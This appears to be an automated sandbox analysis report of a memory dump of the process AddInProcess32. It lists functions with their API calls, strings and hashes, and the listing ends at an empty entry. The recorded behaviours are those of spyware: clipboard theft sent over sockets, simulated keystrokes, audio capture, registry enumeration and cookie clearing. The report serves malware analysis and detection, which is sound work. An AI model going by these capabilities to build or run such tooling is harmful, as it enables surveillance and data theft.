                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 201697637-0
                                                                                                        • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                        • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                        • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                        • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                        Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                        • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                        • _free.LIBCMT ref: 00444714
                                                                                                        • _free.LIBCMT ref: 0044472D
                                                                                                        • _free.LIBCMT ref: 0044475F
                                                                                                        • _free.LIBCMT ref: 00444768
                                                                                                        • _free.LIBCMT ref: 00444774
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                        • String ID: C
                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                        • Opcode ID: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                        • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                        • Opcode Fuzzy Hash: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                        • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                        Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: tcp$udp
                                                                                                        • API String ID: 0-3725065008
                                                                                                        • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                        • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                        • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                        • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                        Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ExitThread.KERNEL32 ref: 004017F4
                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                        • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                        • String ID: T=G$p[G$>G$>G
                                                                                                        • API String ID: 1596592924-2461731529
                                                                                                        • Opcode ID: b033b66669596b249d1ce25b62a4281e1d13c05af68800beb23af724c3c7b6f6
                                                                                                        • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                        • Opcode Fuzzy Hash: b033b66669596b249d1ce25b62a4281e1d13c05af68800beb23af724c3c7b6f6
                                                                                                        • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                        Function 00437A80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm$m/
                                                                                                        • API String ID: 1170836740-240111175
                                                                                                        • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                        • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                        • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                        • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                        Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                          • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                          • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                        • String ID: .part
                                                                                                        • API String ID: 1303771098-3499674018
                                                                                                        • Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                        • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                        • Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                        • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                        Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                          • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                          • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                          • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                        • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                        • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                        • API String ID: 37874593-703403762
                                                                                                        • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                        • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                        • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                        • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                        Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                        • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                        • __freea.LIBCMT ref: 00449B37
                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        • __freea.LIBCMT ref: 00449B40
                                                                                                        • __freea.LIBCMT ref: 00449B65
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3864826663-0
                                                                                                        • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                        • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                        • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                        • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                        Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendInput.USER32 ref: 00418B08
                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                          • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InputSend$Virtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1167301434-0
                                                                                                        • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                        • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                        • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                        • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                        Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenClipboard.USER32 ref: 00415A46
                                                                                                        • EmptyClipboard.USER32 ref: 00415A54
                                                                                                        • CloseClipboard.USER32 ref: 00415A5A
                                                                                                        • OpenClipboard.USER32 ref: 00415A61
                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                        • CloseClipboard.USER32 ref: 00415A89
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                        • String ID:
                                                                                                        • API String ID: 2172192267-0
                                                                                                        • Opcode ID: 6a9ec668e7fdea89666e78c86b70ee6c6b12921e874800debc66150193591dc0
                                                                                                        • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                        • Opcode Fuzzy Hash: 6a9ec668e7fdea89666e78c86b70ee6c6b12921e874800debc66150193591dc0
                                                                                                        • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                        Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00447EBC
                                                                                                        • _free.LIBCMT ref: 00447EE0
                                                                                                        • _free.LIBCMT ref: 00448067
                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                        • _free.LIBCMT ref: 00448233
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                        • String ID:
                                                                                                        • API String ID: 314583886-0
                                                                                                        • Opcode ID: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                                        • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                        • Opcode Fuzzy Hash: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                                        • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                        Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 6e270e3566a57228008d5882711c0e5bb0e0dd5acca1278b8e6f8f313ed3fb9f
                                                                                                        • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                        • Opcode Fuzzy Hash: 6e270e3566a57228008d5882711c0e5bb0e0dd5acca1278b8e6f8f313ed3fb9f
                                                                                                        • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                        Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        • _free.LIBCMT ref: 00444086
                                                                                                        • _free.LIBCMT ref: 0044409D
                                                                                                        • _free.LIBCMT ref: 004440BC
                                                                                                        • _free.LIBCMT ref: 004440D7
                                                                                                        • _free.LIBCMT ref: 004440EE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$AllocateHeap
                                                                                                        • String ID: J7D
                                                                                                        • API String ID: 3033488037-1677391033
                                                                                                        • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                        • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                        • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                        • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                        Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                        • __fassign.LIBCMT ref: 0044A180
                                                                                                        • __fassign.LIBCMT ref: 0044A19B
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                        • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1324828854-0
                                                                                                        • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                        • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                        • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                        • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                        Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID: HE$HE
                                                                                                        • API String ID: 269201875-1978648262
                                                                                                        • Opcode ID: be36c282a63d03c20bc32278ff653e2fb99f791dd32da19cc4c4d74979feac0c
                                                                                                        • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                        • Opcode Fuzzy Hash: be36c282a63d03c20bc32278ff653e2fb99f791dd32da19cc4c4d74979feac0c
                                                                                                        • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                        Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                          • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                          • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                                                                        • String ID: TUFTUF$>G$DG$DG
                                                                                                        • API String ID: 3114080316-344394840
                                                                                                        • Opcode ID: a7cbbf494201fdfd46b352284ff1bc29af0ab57b085014640ab1cd51c4bb0307
                                                                                                        • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                        • Opcode Fuzzy Hash: a7cbbf494201fdfd46b352284ff1bc29af0ab57b085014640ab1cd51c4bb0307
                                                                                                        • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                        Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                        • API String ID: 1133728706-4073444585
                                                                                                        • Opcode ID: ed863c921e9cafa649e96df88b724608b92e8b32daa03b13c741907c5a10fac7
                                                                                                        • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                        • Opcode Fuzzy Hash: ed863c921e9cafa649e96df88b724608b92e8b32daa03b13c741907c5a10fac7
                                                                                                        • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                        Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                                        • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                        • Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                                        • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                        Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
